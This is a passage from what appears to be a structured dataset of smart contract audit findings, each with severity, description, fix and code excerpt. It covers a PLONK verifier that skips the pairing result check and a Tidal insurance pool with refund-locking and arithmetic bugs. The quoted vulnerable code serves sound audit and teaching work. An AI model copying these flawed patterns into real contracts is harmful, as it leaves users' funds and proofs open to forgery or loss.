17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\nчConduct a proper MPC to generate CRS like the Powers of Tau MPC or use a trustworthy CRS generated by an exisiting audited trusted setup like Aztec's ignitionчч```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 17691709543839494245591259280773972507311536864513996659348773884770927133474;\\nuint256 constant g2\\_srs\\_1\\_y\\_0 = 2799122126101651639961126614695310298819570600001757598712033559848160757380;\\nuint256 constant g2\\_srs\\_1\\_y\\_1 = 3054480525781015242495808388429905877188466478626784485318957932446534030175;\\n```\\n -Missing Verifying Paring Check ResultчhighчIn function `batch_verify_multi_points`, the SNARK paring check is done by calling paring pre-compile `let l_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)` and the only the execution status is stored in the final success state (state_success), but the the paring check result which is stored in 0x00 is not stored and checked, which means if the paring check result is 0 (pairing check failed), the proof would still pass verification, e.g. invalid proof with incorrect proof element `proof_openings_selector_commit_api_at_zeta` would pass the paring check. As a result it breaks the SNARK paring verification.\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n\\nAnother example is, if either of the following is sent as a point at infinity or (0,0) as (x,y) co-ordinate:\\ncommitment to the opening proof polynomial Wz\\ncommitment to the opening proof polynomial Wzw\\nThe proof will still work, since the pairing result is not being checked.чVerify paring check result and store it in the final success state after calling the paring pre-compileчч```\\nlet l\\_success := staticcall(sub(gas(), 2000),8,mPtr,0x180,0x00,0x20)\\n// l\\_success := true\\nmstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n```\\n -Gas Greifing and Missing Return Status Check for staticcall(s), May Lead to Unexpected Outcomes Partially AddressedчhighчThe gas supplied to the staticcall(s), is calculated by subtracting `2000` from the remaining gas at this point in time. However, if not provided enough gas, the staticcall(s) may fail and there will be no return data, and the execution will continue with the stale data that was previously there at the memory location specified by the return offset with the staticcall(s).\\n1- Predictable Derivation of Challenges\\nThe function `derive_gamma_beta_alpha_zeta` is used to derive the challenge values `gamma`, `beta`, `alpha`, `zeta`. These values are derived from the prover's transcript by hashing defined parameters and are supposed to be unpredictable by either the prover or the verifier. The hash is collected with the help of SHA2-256 precompile. The values are considered unpredictable, due to the assumption that SHA2-256 acts as a random oracle and it would be computationally infeasible for an attacker to find the pre-image of `gamma`. However, the assumption might be wrong.\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0x24, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), 0x65, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1c), 0xe4, mPtr, 0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr,start\\_input), size\\_input, add(state, state\\_gamma\\_kzg), 0x20))\\n```\\n\\nIf the staticcall(s) fails, it will make the challenge values to be predictable and may help the prover in forging proofs and launching other adversarial attacks.\\n2- Incorrect Exponentiation\\nFunctions `compute_ith_lagrange_at_z`, `compute_pi`, and `verify` compute modular exponentiation by making a `staticcall` to the precompile `modexp` as:\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,0x00,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\n```\\npop(staticcall(sub(gas(), 2000),0x05,mPtr,0xc0,mPtr,0x20))\\n```\\n\\nHowever, if not supplied enough gas, the staticcall(s) will fail, thus returning no result and the execution will continue with the stale data.\\n3. Incorrect Point Addition and Scalar Multiplication\\n```\\npop(staticcall(sub(gas(), 2000),7,folded\\_evals\\_commit,0x60,folded\\_evals\\_commit,0x40))\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),6,mPtr,0x80,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n```\\n\\n```\\nlet l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n```\\n\\n```\\nl\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n```\\n\\nFor the same reason, `point_add`, `point_mul`, and `point_acc_mul` will return incorrect results. Matter of fact, `point_acc_mul` will not revert even if the scalar multiplication fails in the first step. Because, the memory location specified for the return offset, will still be containing the old (x,y) coordinates of `src`, which are points on the curve. Hence, it will proceed by incorrectly adding (x,y) coordinates of `dst` with it.\\nHowever, it will not be practically possible to conduct a gas griefing attack for staticcall(s) at the start of the top-level transaction. As it will require an attacker to pass a very low amount of gas to make the `staticcall` fail, but at the same time, that would not be enough to make the top-level transaction execute entirely and not run out of gas. But, this can still be conducted for the staticcall(s) that are executed at the near end of the top-level transaction.чCheck the returned status of the staticcall and revert if any of the staticcall's return status has been 0.\\nAlso fix the comments mentioned for every staticcall, for instance: the function `derive_beta` says `0x1b -> 000..\"gamma\"` while the memory pointer holds the ASCII value of string `beta`чч```\\npop(staticcall(sub(gas(), 2000), 0x2, add(mPtr, 0x1b), size, mPtr, 0x20)) //0x1b -> 000..\"gamma\"\\n```\\n -Missing Scalar Field Range Check in Scalar MultiplicationчhighчThere is no field element range check on scalar field proof elements e.g. `proof_l_at_zeta, proof_r_at_zeta, proof_o_at_zeta, proof_s1_at_zeta,proof_s2_at_zeta, proof_grand_product_at_zeta_omega` as mentioned in the step 2 of the verifier's algorithm in the Plonk paper. The scalar multiplication functions `point_mul` and `point_acc_mul` call precompile ECMUL, according to EIP-169 , which would verify the point P is on curve and P.x and P.y is less than the base field modulus, however it doesn't check the scalar `s` is less than scalar field modulus, if `s` is greater than scalar field modulus `r_mod`, it would cause unintended behavior of the contract, specifically if the scalar field proof element `e` are replaced by `e` + `r_mod`, the proof would still pass verification. Although in Plonk's case, there is few attacker vectors could exists be based on this kind of proof malleability.\\n```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\nчAdd scalar field range check on scalar multiplication functions `point_mul` and `point_acc_mul` or the scalar field proof elements.чч```\\nfunction point\\_mul(dst,src,s, mPtr) {\\n // let mPtr := add(mload(0x40), state\\_last\\_mem)\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,dst,0x40)\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n\\n// dst <- dst + [s]src (Elliptic curve)\\nfunction point\\_acc\\_mul(dst,src,s, mPtr) {\\n let state := mload(0x40)\\n mstore(mPtr,mload(src))\\n mstore(add(mPtr,0x20),mload(add(src,0x20)))\\n mstore(add(mPtr,0x40),s)\\n let l\\_success := staticcall(sub(gas(), 2000),7,mPtr,0x60,mPtr,0x40)\\n mstore(add(mPtr,0x40),mload(dst))\\n mstore(add(mPtr,0x60),mload(add(dst,0x20)))\\n l\\_success := and(l\\_success, staticcall(sub(gas(), 2000),6,mPtr,0x80,dst, 0x40))\\n mstore(add(state, state\\_success), and(l\\_success,mload(add(state, state\\_success))))\\n}\\n```\\n -Missing Public Inputs Range CheckчhighчThe public input is an array of `uint256` numbers, there is no check if each public input is less than SNARK scalar field modulus `r_mod`, as mentioned in the step 3 of the verifier's algorithm in the Plonk paper. Since public inputs are involved computation of `Pi` in the plonk gate which is in the SNARK scalar field, without the check, it might cause scalar field overflow and the verification contract would fail and revert. To prevent overflow and other unintended behavior there should be a range check for the public inputs.\\n```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n\\n```\\nsum\\_pi\\_wo\\_api\\_commit(add(public\\_inputs,0x20), mload(public\\_inputs), zeta)\\npi := mload(mload(0x40))\\n\\nfunction sum\\_pi\\_wo\\_api\\_commit(ins, n, z) {\\n let li := mload(0x40)\\n batch\\_compute\\_lagranges\\_at\\_z(z, n, li)\\n let res := 0\\n let tmp := 0\\n for {let i:=0} lt(i,n) {i:=add(i,1)}\\n {\\n tmp := mulmod(mload(li), mload(ins), r\\_mod)\\n res := addmod(res, tmp, r\\_mod)\\n li := add(li, 0x20)\\n ins := add(ins, 0x20)\\n }\\n mstore(mload(0x40), res)\\n}\\n```\\nчAdd range check for the public inputs `require(input[i] < r_mod, \"public inputs greater than snark scalar field\");`чч```\\nfunction Verify(bytes memory proof, uint256[] memory public\\_inputs)\\n```\\n -Loading Arbitrary Data as Wire Commitments AcknowledgedчmediumчFunction `load_wire_commitments_commit_api` as the name suggests, loads wire commitments from the proof into the memory array `wire_commitments`. The array is made to hold 2 values per commitment or the size of the array is 2 * `vk_nb_commitments_commit_api`, which makes sense as these 2 values are the x & y co-ordinates of the commitments.\\n```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n\\nComing back to the functionload_wire_commitments_commit_api, it extracts both the x & y coordinates of a commitment in a single iteration. However, the loop runs `2 * vk_nb_commitments_commit_api`, or in other words, twice as many of the required iterations. For instance, if there is 1 commitment, it will run two times. The first iteration will pick up the actual coordinates and the second one can pick any arbitrary data from the proof(if passed) and load it into memory. Although, this data which has been loaded in an extra iteration seems harmless but still adds an overhead for the processing.\\n```\\nfor {let i:=0} lt(i, mul(vk\\_nb\\_commitments\\_commit\\_api,2)) {i:=add(i,1)}\\n```\\nчThe number of iterations should be equal to the size of commitments, i.e., `vk_nb_commitments_commit_api`. So consider switching from:\\n```\\nfor {let i:=0} lt(i, mul(vk_nb_commitments_commit_api,2)) {i:=add(i,1)}\\n```\\n\\nto:\\n```\\nfor {let i:=0} lt(i, vk_nb_commitments_commit_api) {i:=add(i,1)}\\n```\\nчч```\\nuint256[] memory wire\\_committed\\_commitments = new uint256[](2\\*vk\\_nb\\_commitments\\_commit\\_api);\\nload\\_wire\\_commitments\\_commit\\_api(wire\\_committed\\_commitments, proof);\\n```\\n -Makefile: Target OrderчlowчThe target `all` in the Makefile ostensibly wants to run the targets `clean` and `solc` in that order.\\n```\\nall: clean solc\\n```\\n\\nHowever prerequisites in GNU Make are not ordered, and they might even run in parallel. In this case, this could cause spurious behavior like overwrite errors or files being deleted just after being created.чThe Make way to ensure that targets run one after the other is\\n```\\nall: clean\\n $(MAKE) solc\\n```\\n\\nAlso `all` should be listed in the PHONY targets.чч```\\nall: clean solc\\n```\\n -addPremium - A back runner may cause an insurance holder to lose their refunds by calling addPremium right after the original callчhighч`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\nч`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.чч```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\n -refund - attacker can lock insurance holder's refunds by calling refund before a refund was allocatedчhighч`addPremium` is used to determine the `refund` amount that an insurance holder is eligible to claim. The amount is stored in the `refundMap` mapping and can then later be claimed by anyone on behalf of an insurance holder by calling `refund`. The `refund` function can't be called more than once for a given combination of `policyIndex_`, `week_`, and `who_`, as it would revert with an “Already refunded” error. This gives an attacker the opportunity to call `refund` on behalf of any insurance holder with value 0 inside the `refundMap`, causing any future `refund` allocated for that holder in a given week and for a given policy to be locked forever in the contract (unless the contract is upgraded).\\n```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\nчThere should be a validation check at the beginning of the function that reverts if `refundMap[policyIndex_][week_] == 0`.чч```\\nfunction refund(\\n uint256 policyIndex\\_,\\n uint256 week\\_,\\n address who\\_\\n) external noReenter {\\n Coverage storage coverage = coverageMap[policyIndex\\_][week\\_][who\\_];\\n\\n require(!coverage.refunded, \"Already refunded\");\\n\\n uint256 allCovered = coveredMap[policyIndex\\_][week\\_];\\n uint256 amountToRefund = refundMap[policyIndex\\_][week\\_].mul(\\n coverage.amount).div(allCovered);\\n coverage.amount = coverage.amount.mul(\\n coverage.premium.sub(amountToRefund)).div(coverage.premium);\\n coverage.refunded = true;\\n\\n IERC20(baseToken).safeTransfer(who\\_, amountToRefund);\\n\\n if (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).refund(\\n policyIndex\\_,\\n week\\_,\\n who\\_,\\n amountToRefund\\n );\\n }\\n}\\n```\\n -addTidal, _updateUserTidal, withdrawTidal - wrong arithmetic calculationsчhighчTo further incentivize sellers, anyone - although it will usually be the pool manager - can send an arbitrary amount of the Tidal token to a pool, which is then supposed to be distributed proportionally among the share owners. There are several flaws in the calculations that implement this mechanism:\\nA. addTidal:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n\\nThis should be:\\n```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS).div(poolInfo.totalShare));\\n```\\n\\nNote the different parenthesization. Without SafeMath:\\n```\\npoolInfo.accTidalPerShare += amount\\_ \\* SHARE\\_UNITS / poolInfo.totalShare;\\n```\\n\\nB. _updateUserTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nThis should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul`. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nC. withdrawTidal:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.add(userInfo.share);\\n```\\n\\nAs in B, this should be:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare.mul(\\n userInfo.share).div(SHARE\\_UNITS);\\n```\\n\\nNote that `add` has been replaced with `mul` and that a division by `SHARE_UNITS` has been appended. Without SafeMath:\\n```\\nuint256 accAmount = poolInfo.accTidalPerShare \\* userInfo.share / SHARE\\_UNITS;\\n```\\n\\nAs an additional minor point, the division in `addTidal` will revert with a panic (0x12) if the number of shares in the pool is zero. This case could be handled more gracefully.чImplement the fixes described above. The versions without `SafeMath` are easier to read and should be preferred; see https://github.com/ConsensysDiligence/tidal-audit-2023-04/issues/20.чч```\\npoolInfo.accTidalPerShare = poolInfo.accTidalPerShare.add(\\n amount\\_.mul(SHARE\\_UNITS)).div(poolInfo.totalShare);\\n```\\n -claim - Incomplete and lenient implementationчhighчIn the current version of the code, the `claim` function is lacking crucial input validation logic as well as required state changes. Most of the process is implemented in other contracts or off-chain at the moment and is therefore out of scope for this audit, but there might still be issues caused by potential errors in the process. Moreover, pool manager and committee together have unlimited ownership of the deposits and can essentially withdraw all collateral to any desired address.\\n```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\nчTo ensure a more secure claiming process, we propose adding the following logic to the `claim` function:\\n`refund` should be called at the beginning of the `claim` flow, so that the recipient's true coverage amount will be used.\\n`policyIndex` should be added as a parameter to this function, so that `coverageMap` can be used to validate that the amount claimed on behalf of a recipient is covered.\\nThe payout amount should be subtracted in the `coveredMap` and `coverageMap` mappings.чч```\\nfunction claim(\\n uint256 policyIndex\\_,\\n uint256 amount\\_,\\n address receipient\\_\\n) external onlyPoolManager {\\n```\\n -buy - insurance buyers trying to increase their coverage amount will lose their previous coverageчhighчWhen a user is willing to `buy` insurance, he is required to specify the desired amount (denoted as amount_) and to pay the entire premium upfront. In return, he receives the ownership over an entry inside the `coverageMap` mapping. If a user calls the `buy` function more than once for the same policy and time frame, his entry in the `coverageMap` will not represent the accumulated amount that he paid for but only the last coverage amount, which means previous coverage will be lost forever (unless the contract is upgraded).\\n```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\nчThe coverage entry that represents the user's coverage should not be overwritten but should hold the accumulated amount of coverage instead.чч```\\nfor (uint256 w = fromWeek\\_; w < toWeek\\_; ++w) {\\n incomeMap[policyIndex\\_][w] =\\n incomeMap[policyIndex\\_][w].add(premium);\\n coveredMap[policyIndex\\_][w] =\\n coveredMap[policyIndex\\_][w].add(amount\\_);\\n\\n require(coveredMap[policyIndex\\_][w] <= maximumToCover,\\n \"Not enough to buy\");\\n\\n coverageMap[policyIndex\\_][w][\\_msgSender()] = Coverage({\\n amount: amount\\_,\\n premium: premium,\\n refunded: false\\n });\\n}\\n```\\n -Several issues related to upgradeability of contractsчmediumчWe did not find a proxy contract or factory in the repository, but the README contains the following information:\\ncode/README.md:L11\\n```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n\\ncode/README.md:L56\\n```\\nAnd there will be multiple proxies and one implementation of the Pools, and one proxy and one implementation of EventAggregator.\\n```\\n\\nThere are several issues related to upgradeability or, generally, using the contracts as implementations for proxies. All recommendations in this report assume that it is not necessary to remain compatible with an existing deployment.\\nB. If upgradeability is supposed to work with inheritance, there should be dummy variables at the end of each contract in the inheritance hierarchy. Some of these have to be removed when “real” state variables are added. More precisely, it is conventional to use a fixed-size `uint256` array `__gap`, such that the consecutively occupied slots at the beginning (for the “real” state variables) add up to 50 with the size of the array. If state variables are added later, the gap's size has to be reduced accordingly to maintain this invariant. Currently, the contracts do not declare such a `__gap` variable.\\nC. Implementation contracts should not remain uninitalized. To prevent initialization by an attacker - which, in some cases, can have an impact on the proxy - the implementation contract's constructor should call `_disableInitializers`.чRefamiliarize yourself with the subtleties and pitfalls of upgradeable `contracts`, in particular regarding state variables and the storage gap. A lot of useful information can be found here.\\nOnly import from `contracts-upgradeable`, not from `contracts`.\\nAdd appropriately-sized storage gaps at least to `PoolModel`, `NonReentrancy`, and `EventAggregator`. (Note that adding a storage gap to `NonReentrancy` will break compatibility with existing deployments.) Ideally, add comments and warnings to each file that state variables may only be added at the end, that the storage gap's size has to be reduced accordingly, and that state variables must not be removed, rearranged, or in any way altered (e.g., type, `constant`, immutable). No state variables should ever be added to the `Pool` contract, and a comment should make that clear.\\nAdd a constructor to `Pool` and `EventAggregator` that calls `_disableInitializers`.чч```\\nEvery Pool is a standalone smart contract. It is made upgradeable with OpenZeppelin's Proxy Upgrade Pattern.\\n```\\n -initialize - Committee members array can contain duplicatesчmediumчThe initial committee members are given as array argument to the pool's `initialize` function. When the array is processed, there is no check for duplicates, and duplicates may also end up in the storage array `committeeArray`.\\n```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n\\nDuplicates will result in a discrepancy between the length of the array - which is later interpreted as the number of committee members - and the actual number of (different) committee members. This could lead to more problems, such as an insufficient committee size to reach the threshold.чThe `initialize` function should verify in the loop that `member` hasn't been added before. Note that `_executeAddToCommittee` refuses to add someone who is already in the committee, and the same technique can be employed here.чч```\\nfor (uint256 i = 0; i < committeeMembers\\_.length; ++i) {\\n address member = committeeMembers\\_[i];\\n committeeArray.push(member);\\n committeeIndexPlusOne[member] = committeeArray.length;\\n}\\n```\\n -Pool.buy- Users may end up paying more than intended due to changes in policy.weeklyPremiumчmediumчThe price that an insurance buyer has to pay for insurance is determined by the duration of the coverage and the `weeklyPremium`. The price increases as the `weeklyPremium` increases. If a `buy` transaction is waiting in the mempool but eventually front-run by another transaction that increases `weeklyPremium`, the user will end up paying more than they anticipated for the same insurance coverage (assuming their allowance to the `Pool` contract is unlimited or at least higher than what they expected to pay).\\n```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\nчConsider adding a parameter for the maximum amount to pay, and make sure that the transaction will revert if `allPremium` is greater than this maximum value.чч```\\nuint256 premium = amount\\_.mul(policy.weeklyPremium).div(RATIO\\_BASE);\\nuint256 allPremium = premium.mul(toWeek\\_.sub(fromWeek\\_));\\n```\\n -Missing validation checks in executeчmediumчThe `Pool` contract implements a threshold voting mechanism for some changes in the contract state, where either the pool manager or a committee member can propose a change by calling `claim`, `changePoolManager`, `addToCommittee`, `removeFromCommittee`, or `changeCommitteeThreshold`, and then the committee has a time period for voting. If the threshold is reached during this period, then anyone can call `execute` to `execute` the state change.\\nWhile some validation checks are implemented in the proposal phase, this is not enough to ensure that business logic rules around these changes are completely enforced.\\n`_executeRemoveFromCommittee` - While the `removeFromCommittee` function makes sure that `committeeArray.length > committeeThreshold`, i.e., that there should always be enough committee members to reach the threshold, the same validation check is not enforced in `_executeRemoveFromCommittee`. To better illustrate the issue, let's consider the following example: `committeeArray.length = 5`, `committeeThreshold = 4`, and now `removeFromCommittee` is called two times in a row, where the second call is made before the first call reaches the threshold. In this case, both requests will be executed successfully, and we end up with `committeeArray.length = 3` and `committeeThreshold = 4`, which is clearly not desired.\\n`_executeChangeCommitteeThreshold` - Applying the same concept here, this function lacks the validation check of `threshold_ <= committeeArray.length`, leading to the same issue as above. Let's consider the following example: `committeeArray.length = 3`, `committeeThreshold = 2`, and now changeCommitteeThresholdis called with `threshold_ = 3`, but before this request is executed, `removeFromCommittee` is called. After both requests have been executed successfully, we will end up with `committeeThreshold = 3` and `committeeArray.length = 2`, which is clearly not desired.\\n```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n\\n```\\nfunction \\_executeChangeCommitteeThreshold(uint256 threshold\\_) private {\\n```\\nчApply the same validation checks in the functions that execute the state change.чч```\\nfunction \\_executeRemoveFromCommittee(address who\\_) private {\\n```\\n -Hard-coded minimum deposit amountчlowчResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nThe `deposit` function specifies a minimum amount of 1e12 units of the base token for a deposit:\\n```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n\\n```\\n// Anyone can be a seller, and deposit baseToken (e.g. USDC or WETH)\\n// to the pool.\\nfunction deposit(\\n uint256 amount\\_\\n) external noReenter {\\n require(enabled, \"Not enabled\");\\n\\n require(amount\\_ >= AMOUNT\\_PER\\_SHARE / 1000000, \"Less than minimum\");\\n```\\n\\nWhether that's an appropriate minimum amount or not depends on the base token. Note that the two example tokens listed above are USDC and WETH. With current ETH prices, 1e12 Wei cost an affordable 0.2 US Cent. USDC, on the other hand, has 6 decimals, so 1e12 units are worth 1 million USD, which is … steep.чThe minimum deposit amount should be configurable.чч```\\nuint256 constant AMOUNT\\_PER\\_SHARE = 1e18;\\n```\\n -Outdated Solidity versionчlowчThe source files' version pragmas either specify that they need compiler version exactly 0.8.10 or at least 0.8.10:\\n```\\npragma solidity 0.8.10;\\n```\\n\\n```\\npragma solidity ^0.8.10;\\n```\\n\\nSolidity v0.8.10 is a fairly dated version that has known security issues. We generally recommend using the latest version of the compiler (at the time of writing, this is v0.8.20), and we also discourage the use of floating pragmas to make sure that the source files are actually compiled and deployed with the same compiler version they have been tested with.чResolution\\nFixed in 3bbafab926df0ea39f444ef0fd5d2a6197f99a5d by implementing the auditor's recommendation.\\nUse the Solidity compiler v0.8.20, and change the version pragma in all Solidity source files to `pragma solidity 0.8.20;`.чч```\\npragma solidity 0.8.10;\\n```\\n -Code used for testing purposes should be removed before deploymentчlowчVariables and logic have been added to the code whose only purpose is to make it easier to test. This might cause unexpected behavior if deployed in production. For instance, `onlyTest` and `setTimeExtra` should be removed from the code before deployment, as well as `timeExtra` in `getCurrentWeek` and `getNow`.\\n```\\nmodifier onlyTest() {\\n```\\n\\n```\\nfunction setTimeExtra(uint256 timeExtra\\_) external onlyTest {\\n```\\n\\n```\\nfunction getCurrentWeek() public view returns(uint256) {\\n return (block.timestamp + TIME\\_OFFSET + timeExtra) / (7 days);\\n}\\n```\\n\\n```\\nfunction getNow() public view returns(uint256) {\\n return block.timestamp + timeExtra;\\n}\\n```\\nчFor the long term, consider mimicking this behavior by using features offered by your testing framework.чч```\\nmodifier onlyTest() {\\n```\\n -Missing eventsчlowчSome state-changing functions do not emit an event at all or omit relevant information.\\nA. `Pool.setEventAggregator` should emit an event with the value of `eventAggregator_` so that off-chain services will be notified and can automatically adjust.\\n```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n\\nB. `Pool.enablePool` should emit an event when the pool is dis- or enabled.\\n```\\nfunction enablePool(bool enabled\\_) external onlyPoolManager {\\n enabled = enabled\\_;\\n}\\n```\\n\\nC. `Pool.execute` only logs the `requestIndex_` while it should also include the `operation` and `data` to better reflect the state change in the transaction.\\n```\\nif (eventAggregator != address(0)) {\\n IEventAggregator(eventAggregator).execute(\\n requestIndex\\_\\n );\\n}\\n```\\nчState-changing functions should emit an event to have an audit trail and enable monitoring of smart contract usage.чч```\\nfunction setEventAggregator(address eventAggregator\\_) external onlyPoolManager {\\n eventAggregator = eventAggregator\\_;\\n}\\n```\\n -addPremium - A Back Runner May Cause an Insurance Holder to Lose Their Refunds by Calling addPremium Right After the Original Callчhighч`addPremium` is a public function that can be called by anyone and that distributes the weekly premium payments to the pool manager and the rest of the pool share holders. If the collateral deposited is not enough to cover the total coverage offered to insurance holders for a given week, refunds are allocated pro rata for all insurance holders of that particular week and policy. However, in the current implementation, attackers can call `addPremium` right after the original call to `addPremium` but before the call to refund; this will cause the insurance holders to lose their refunds, which will be effectively locked forever in the contract (unless the contract is upgraded).\\n```\\nrefundMap[policyIndex\\_][week] = incomeMap[policyIndex\\_][week].mul(\\n allCovered.sub(maximumToCover)).div(allCovered);\\n```\\nч`addPremium` should contain a validation check in the beginning of the function that reverts for the case of `incomeMap[policyIndex_][week] = 0`.чч```\\nrefundMap[policyIndex\\_][week] 